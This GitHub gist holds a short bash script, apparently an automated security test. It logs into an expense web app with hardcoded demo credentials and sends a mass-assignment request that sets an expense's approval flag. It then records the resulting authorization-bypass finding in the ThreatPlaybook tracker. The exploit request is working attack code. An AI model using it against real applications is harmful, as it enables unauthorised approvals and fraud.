Created
July 16, 2020 10:16
-
-
Save abhaybhargav/63fc33a23a8ce0fc6497cf28f69db028 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| TOKEN=$(http POST http://$1:3000/users/login email=maya.williams@widget.co password=superman123 --check-status | jq -r .token) | |
| authRetVal=$? | |
| if [ $authRetVal -ne 0 ]; then | |
| echo "Unable to Authenticate to Web Service" | |
| exit 1 | |
| fi | |
| http POST http://$1:3000/expenses/update_expense/5ace11e4b10d64111c00adb3/ Authorization:$TOKEN amount=30 merchant="Gunrock Café" name="Dinner at Airport Food Court" isApproved=true --check-status | |
| exploitRetVal=$? | |
| if [ $exploitRetVal -ne 0 ]; then | |
| echo "Unable to tamper with approval status" | |
| exit 0 | |
| fi | |
| TP_TOKEN=$(http POST http://$SERVER_IP:81/api/login email=admin@admin.com password=supersecret | jq -r .data.token) | |
| SCAN_NAME=$(http POST http://$SERVER_IP:81/api/scan/create Authorization:$TP_TOKEN tool=manual target=newwebapp2 | jq -r .data.name) | |
| http POST http://$SERVER_IP:81/api/vulnerability/create Authorization:$TP_TOKEN scan=$SCAN_NAME name="Authorization Bypass through Mass Assignment" cwe:=639 severity:=3 description="User is able to escalate privileges and perform approvals for invoices raised by the user" vul_name="Mass Assignment" --check-status | |
| pushRetVal=$? | |
| if [ $pushRetVal -ne 0 ]; then | |
| echo "Unable to create scan" | |
| exit 1 | |
| fi | |
| echo "Successfully created scan and vulnerability in ThreatPlaybook" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment